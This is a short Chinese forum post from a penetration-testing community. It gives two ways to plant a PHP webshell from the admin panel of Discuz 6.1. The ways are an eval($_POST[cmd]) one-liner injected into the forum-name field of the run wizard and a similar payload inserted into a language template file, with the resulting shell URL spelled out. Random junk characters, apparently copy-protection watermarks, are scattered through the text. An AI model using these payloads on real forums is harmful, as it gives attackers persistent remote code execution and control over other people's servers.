中国网络渗透测试联盟

标题: discuz6.1后台拿shell方法 [打印本页]
作者: admin    时间: 2012-9-13 16:59
标题: discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell. d* M$ b( }. r- V3 A. p" A1 u
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下4 I& ?/ K2 u* I6 L- P) n
1:
/ ?* e  `; j& x: u  {http://127.0.0.1/discuz/admincp. ... zard&frames=yes
, b5 W7 r4 c0 g4 B8 w( B3 Sadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell! v" i7 x* x" c$ q& x! R' Y
<?php eval($_POST[cmd]);?>/ `+ y- p; p8 c6 `, Z, q# B& O" j
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php8 j5 T! L2 D5 v5 C

5 i0 L  S3 g, i! T) i  \8 B
7 U( B% R4 w$ \* p2:后台模板管理--默认模板套系--详情
' F1 y( |' h$ }& b! Q6 v) r, Ktemplates/default/actions.lang.php  J" I/ A# q) S3 L" T, `- E
jhackj\\');eval($_POST[cmd])?>;//
, a$ f* x% o2 Y( ?$ y& |
9 y) o3 \) e& g: D/ H- b- ]利用很简单,聪明的人一看就懂了



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2